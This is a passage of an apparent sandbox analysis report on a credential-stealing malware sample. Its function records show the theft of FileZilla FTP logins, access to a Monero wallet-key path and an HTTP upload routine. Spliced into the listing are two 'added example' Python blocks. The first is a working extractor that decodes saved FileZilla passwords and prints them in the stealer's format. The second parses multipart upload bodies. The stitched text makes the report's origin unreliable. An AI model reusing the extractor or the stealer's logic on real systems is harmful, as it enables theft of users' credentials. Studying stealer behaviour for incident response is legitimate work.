                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ccc0953099c1517eb13cde843ae43c55e3ce36000d44f17b1f31de48788023b
                                        • Instruction ID: 88aeb6cfbd523619e40827c34012a103ab4859502716eba1f2bb0cd09588ac3c
                                        • Opcode Fuzzy Hash: 0ccc0953099c1517eb13cde843ae43c55e3ce36000d44f17b1f31de48788023b
                                        • Instruction Fuzzy Hash: 085136F3A086049BF3086A29EC4577BB7DAEFD0310F1AC93DE78543B84E93959118686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8e4edd508ca09280baecad12bf104fe44bf3b33e641d252f7b3d302b6d22159
                                        • Instruction ID: 487723a61457aa2da1fddc1a839b395e84a0d062444919b408760bcd8d0993e1
                                        • Opcode Fuzzy Hash: a8e4edd508ca09280baecad12bf104fe44bf3b33e641d252f7b3d302b6d22159
                                        • Instruction Fuzzy Hash: 5741AFF250C604DFD3056E69D8956FFBBE5EF94310F22582DD2C6A3220E7B18451AB47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeec325ac6c28a8c40c9422e162ffda2cef9e6ea71b0a083dd647c12b3506d21
                                        • Instruction ID: 578c3c67f81225ee82d204ee48a5e0b73b632e94640cd99493dca0af0994eb2e
                                        • Opcode Fuzzy Hash: eeec325ac6c28a8c40c9422e162ffda2cef9e6ea71b0a083dd647c12b3506d21
                                        • Instruction Fuzzy Hash: 98313CF3E082149BE318AE28DC8077AF3D6EB94310F1B853DDDC957780E93A5C048686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcf72001bcc0294d79660362d40fdbcf7868808b16175e029baed0ef1a8ff3bb
                                        • Instruction ID: a171c051aa09555ff943b03df382748667d5126b70ac9aed423f9615e6968060
                                        • Opcode Fuzzy Hash: fcf72001bcc0294d79660362d40fdbcf7868808b16175e029baed0ef1a8ff3bb
                                        • Instruction Fuzzy Hash: B4217FB251C304AFE315FF69DC82BBABBE5EB58360F05892DE6D4C2640E63594008A97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8baa0a6659c27ea7f487980db080c79c99acbffbdb36184f1c9a6deb47162a1d
                                        • Instruction ID: 966e5d0c91bf6b6ec0902002bef9e2c784f855ca0b7e6b3abf953d5917d33d48
                                        • Opcode Fuzzy Hash: 8baa0a6659c27ea7f487980db080c79c99acbffbdb36184f1c9a6deb47162a1d
                                        • Instruction Fuzzy Hash: 6E1127B3FA051947F7484829DD4479B658397D4324F2FC9388A89977C9E8BEE84A1284
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00A60DBA,00A60DB7,00A60DB6,00A60DB3), ref: 00A50362
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A50369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A50385
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50393
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A503CF
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A503DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00A50419
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A50463
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50475
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50502
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A5051A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50532
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A5054A
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A50562
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00A50571
                                        • lstrcat.KERNEL32(?,url: ), ref: 00A50580
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A50593
                                        • lstrcat.KERNEL32(?,00A61678), ref: 00A505A2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A505B5
                                        • lstrcat.KERNEL32(?,00A6167C), ref: 00A505C4
                                        • lstrcat.KERNEL32(?,login: ), ref: 00A505D3
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A505E6
                                        • lstrcat.KERNEL32(?,00A61688), ref: 00A505F5
                                        • lstrcat.KERNEL32(?,password: ), ref: 00A50604
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A50617
                                        • lstrcat.KERNEL32(?,00A61698), ref: 00A50626
                                        • lstrcat.KERNEL32(?,00A6169C), ref: 00A50635
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A5068E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 9af844053a8bd21da32b882b02ec9f38b9d7944c4b8520f0cbb0649da9249352
                                        • Instruction ID: 95d9bec30c8bf67e7bd831f126e2bf4f530d225f62d70d0a33f51c3843bcce3b
                                        • Opcode Fuzzy Hash: 9af844053a8bd21da32b882b02ec9f38b9d7944c4b8520f0cbb0649da9249352
                                        • Instruction Fuzzy Hash: 1AD15375A00108ABDB04EBF0DE96EEE7778FF24301F544519F902B6191EF74AA0ACB65
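                                        The function record above combines file reads under \AppData\Roaming\FileZilla\recentservers.xml with the element names <Host>, <Port>, <User> and <Pass encoding="base64"> and the output labels "browser: FileZilla", "profile: null", "url:", "login:" and "password:". The following is an added example, not code from the report or from the sample: it parses the same FileZilla file layout so a responder can see exactly which FTP credentials were exposed on an infected host and need rotating. The XML below is constructed for the example; the field layout of the rendered output mirrors the String IDs listed above.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample of a FileZilla recentservers.xml (not taken from the
# analysed host). Element names match the String IDs in the function record.
SAMPLE_RECENTSERVERS = """<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_recentservers(xml_text):
    """Return [{url, login, password}] for every <Server> entry.

    password is None when FileZilla stored no password for the entry
    (e.g. key-based or interactive logon), so callers can tell "no secret"
    apart from an empty string.
    """
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User", default="")
        password = None
        pass_el = server.find("Pass")
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                # FileZilla 3.x obfuscates with base64 only; this is not encryption
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                # older layouts kept the password as plain text
                password = pass_el.text
        entries.append({"url": f"{host}:{port}", "login": user, "password": password})
    return entries


def format_report(entries):
    """Render entries in the browser:/profile:/url:/login:/password: layout
    that the String IDs above show the stealer writing out."""
    lines = []
    for e in entries:
        lines.append("browser: FileZilla")
        lines.append("profile: null")
        lines.append(f"url: {e['url']}")
        lines.append(f"login: {e['login']}")
        lines.append(f"password: {e['password'] if e['password'] is not None else ''}")
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(parse_recentservers(SAMPLE_RECENTSERVERS)))
```

                                        Practitioner note: the base64 "encoding" attribute is obfuscation, not protection, so any saved FileZilla login on a host where this sample ran should be treated as disclosed. FileZilla's sitemanager.xml uses the same element layout (a fact beyond this report, not something the listing shows the sample reading), so the parser also applies there.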
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A459F8
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A45A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A45B93
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0160E9E0,00000000,?,0160AAB8,00000000,?,00A61A1C), ref: 00A45E71
                                        • lstrlen.KERNEL32(00000000), ref: 00A45E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A45E93
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A45E9A
                                        • lstrlen.KERNEL32(00000000), ref: 00A45EAF
                                        • lstrlen.KERNEL32(00000000), ref: 00A45ED8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A45EF1
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00A45F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A45F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A45F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00A45FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00A45FBD
                                        • HttpOpenRequestA.WININET(00000000,0160EB70,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A45BF8
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00A45FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 9f5081046a23e3f0aaf2e44d3cb3927d657301d125e52a8c4e8da405a4a9e903
                                        • Instruction ID: eb489b15b6f8048cfd3f71d54996dc421629836a3314f92ee02c04078b7d464f
                                        • Opcode Fuzzy Hash: 9f5081046a23e3f0aaf2e44d3cb3927d657301d125e52a8c4e8da405a4a9e903
                                        • Instruction Fuzzy Hash: 58121072A20128EBDB15EBA0DD95FEEB378BF64701F404299F50662091EF702A4DCF65
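                                        The function record above is the sample's WinINet upload path (InternetOpenA, InternetConnectA with service type 3, HttpOpenRequestA, HttpSendRequestA, InternetReadFile) and its String IDs are runs of dashes and quote characters, which is consistent with a multipart/form-data request body. As an added example, not code from the report or the sample, the parser below splits a captured body of that layout into its form fields so an analyst can recover what was posted. The request body, the boundary value and the field names (hwid, file) are constructed for the example; the report does not show the sample's actual field names.

```python
import re

# Constructed POST body in multipart/form-data layout (assumed layout, see above).
# Each part is introduced by "--" + boundary, which is where the dash runs come from.
SAMPLE_BOUNDARY = "----ExampleBoundary1234"
SAMPLE_BODY = (
    b"------ExampleBoundary1234\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"0123456789ABCDEF\r\n"
    b"------ExampleBoundary1234\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"browser: FileZilla\r\nprofile: null\r\nurl: ftp.example.test:21\r\n"
    b"login: deploy\r\npassword: hunter2\r\n\r\n"
    b"------ExampleBoundary1234--\r\n"
)


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into {name: (filename_or_None, data)}.

    The CRLF that precedes each delimiter belongs to the delimiter, so it is
    stripped from the part data; a closing "--boundary--" ends the loop.
    """
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # closing delimiter
            break
        part = part.lstrip(b"\r\n")
        head, _, data = part.partition(b"\r\n\r\n")
        data = data.rstrip(b"\r\n")
        # "; name=" avoids matching the name= inside filename=
        name = re.search(rb';\s*name="([^"]*)"', head)
        if not name:
            continue
        fname = re.search(rb'filename="([^"]*)"', head)
        fields[name.group(1).decode()] = (fname.group(1).decode() if fname else None, data)
    return fields


def summarise(fields):
    """One line per field: name, attached filename and payload size, for triage notes."""
    return [f"{n}: filename={f or '-'} bytes={len(d)}" for n, (f, d) in fields.items()]


if __name__ == "__main__":
    for line in summarise(parse_multipart(SAMPLE_BODY, SAMPLE_BOUNDARY)):
        print(line)
```

                                        Usage note: take the boundary from the Content-Type header of the captured request rather than guessing it; the parser returns raw bytes because uploaded archives are usually not text.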
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4CF83
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A4D0C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A4D0CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D208
                                        • lstrcat.KERNEL32(?,00A61478), ref: 00A4D217
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D22A
                                        • lstrcat.KERNEL32(?,00A6147C), ref: 00A4D239
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D24C
                                        • lstrcat.KERNEL32(?,00A61480), ref: 00A4D25B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D26E
                                        • lstrcat.KERNEL32(?,00A61484), ref: 00A4D27D
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D290
                                        • lstrcat.KERNEL32(?,00A61488), ref: 00A4D29F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D2B2
                                        • lstrcat.KERNEL32(?,00A6148C), ref: 00A4D2C1
